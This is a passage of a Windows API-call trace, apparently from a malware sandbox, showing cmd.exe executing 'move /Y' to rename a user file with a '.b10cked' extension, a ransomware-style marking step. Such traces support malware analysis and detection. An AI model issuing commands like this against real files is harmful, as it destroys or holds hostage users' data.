lpSystemTimeAsFileTime=0x1efe1c | out: lpSystemTimeAsFileTime=0x1efe1c*(dwLowDateTime=0xa8be1820, dwHighDateTime=0x1d440a9)) [0194.389] GetCurrentProcessId () returned 0xe08 [0194.389] GetCurrentThreadId () returned 0x728 [0194.389] GetTickCount () returned 0x3731c [0194.389] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe14 | out: lpPerformanceCount=0x1efe14*=25117799514) returned 1 [0194.390] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0194.390] __set_app_type (_Type=0x1) [0194.390] __p__fmode () returned 0x76b331f4 [0194.390] __p__commode () returned 0x76b331fc [0194.390] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0194.390] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0194.390] GetCurrentThreadId () returned 0x728 [0194.390] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x728) returned 0x38 [0194.390] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.390] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0194.390] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.393] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0194.393] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efdac | out: phkResult=0x1efdac*=0x0) returned 0x2 [0194.393] VirtualQuery (in: lpAddress=0x1efde3, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf0000, AllocationBase=0xf0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] GetConsoleOutputCP () returned 0x1b5 [0194.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.405] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.406] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.406] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0194.406] GetEnvironmentStringsW () returned 0x3c0150* [0194.406] FreeEnvironmentStringsW (penv=0x3c0150) returned 1 [0194.406] GetEnvironmentStringsW () returned 0x3c0150* [0194.407] FreeEnvironmentStringsW 
(penv=0x3c0150) returned 1 [0194.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed1c | out: phkResult=0x1eed1c*=0x40) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegCloseKey (hKey=0x40) returned 0x0 [0194.407] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed1c | out: phkResult=0x1eed1c*=0x40) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegCloseKey (hKey=0x40) returned 0x0 [0194.407] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639c [0194.407] srand (_Seed=0x5b88639c) [0194.407] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" [0194.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" [0194.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0194.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.408] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0194.408] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0194.408] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0194.408] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0194.408] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0194.408] GetEnvironmentStringsW () returned 0x3c22a0* [0194.408] FreeEnvironmentStringsW (penv=0x3c22a0) 
returned 1 [0194.408] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.408] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.408] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0194.409] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0194.409] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0194.409] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0194.409] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0194.409] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efae8, lpFilePart=0x1efae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efae4*="Desktop") returned 0x18 [0194.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: hFindFile=0x3bffe0) returned 1 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: hFindFile=0x3bffe0) returned 1 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: 
hFindFile=0x3bffe0) returned 1 [0194.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.410] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0194.410] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0194.410] GetEnvironmentStringsW () returned 0x3c2ac0* [0194.410] FreeEnvironmentStringsW (penv=0x3c2ac0) returned 1 [0194.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.410] GetConsoleOutputCP () returned 0x1b5 [0194.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.410] GetUserDefaultLCID () returned 0x409 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efc28, cchData=128 | out: lpLCData="0") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efc28, cchData=128 | out: lpLCData="0") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efc28, cchData=128 | out: lpLCData="1") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0194.411] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0194.412] GetConsoleTitleW (in: lpConsoleTitle=0x3b08b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0194.413] _wcsicmp (_String1="move", _String2=")") returned 68 [0194.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0194.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0194.419] _wcsicmp (_String1="IF", _String2="move") returned -4 [0194.419] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0194.419] _wcsicmp (_String1="REM", _String2="move") returned 5 [0194.419] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0194.421] GetConsoleTitleW (in: lpConsoleTitle=0x1ef920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.421] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0194.422] _wcsicmp 
(_String1="move", _String2="TYPE") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CD") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="REN") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="SET") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="MD") returned 11 [0194.422] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0194.422] _wcsicmp (_String1="move", _String2="RD") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0194.422] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="VER") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="START") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="DPATH") returned 9 
[0194.422] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0194.422] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0194.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0194.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0194.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef6dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef6d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef6d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) 
returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0194.425] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0194.425] _wcsicmp (_String1="Hx.hxn", _String2=".") returned 58 [0194.425] _wcsicmp (_String1="Hx.hxn", _String2="..") returned 58 [0194.425] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn")) returned 0x2022 [0194.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1d28 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.425] SetErrorMode (uMode=0x0) returned 0x0 [0194.425] SetErrorMode (uMode=0x1) returned 0x0 [0194.425] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", nBufferLength=0x104, lpBuffer=0x1ef064, lpFilePart=0x1ef04c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", lpFilePart=0x1ef04c*="Hx.hxn") returned 0x21 [0194.425] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2010 [0194.426] _wcsicmp (_String1="Hx.hxn", _String2=".") returned 58 [0194.426] _wcsicmp (_String1="Hx.hxn", _String2="..") returned 58 [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn")) returned 0x2022 [0194.426] SetErrorMode (uMode=0x0) returned 0x0 [0194.426] SetErrorMode (uMode=0x1) returned 0x0 [0194.426] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", nBufferLength=0x104, lpBuffer=0x1ef4e0, lpFilePart=0x1ef278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", lpFilePart=0x1ef278*="Hx.hxn") returned 0x21 [0194.426] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] SetErrorMode (uMode=0x0) returned 0x0 [0194.426] SetErrorMode (uMode=0x1) returned 0x0 [0194.426] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef6e8, lpFilePart=0x1ef278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked", lpFilePart=0x1ef278*="Hx.hxn.b10cked") returned 0x29 [0194.426] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] SetLastError (dwErrCode=0x0) [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn.b10cked")) returned 0xffffffff [0194.426] GetLastError () returned 0x2 [0194.426] FindFirstFileExW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x1eebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eebf4) returned 0x3c2198 [0194.427] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x1eebf4 | out: lpFindFileData=0x1eebf4) returned 0 [0194.427] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.427] GetLastError () returned 0x12 [0194.427] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x1eebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eebf4) returned 0x3c2198 [0194.427] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x1eebf4 | out: lpFindFileData=0x1eebf4) returned 0 [0194.427] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.427] GetLastError () returned 0x12 [0194.428] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x3c1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1ac8) returned 0x3c2198 [0194.428] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x3c1ac8 | out: lpFindFileData=0x3c1ac8) returned 0 [0194.428] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.428] GetLastError () returned 0x12 [0194.428] FindFirstFileExW (in: 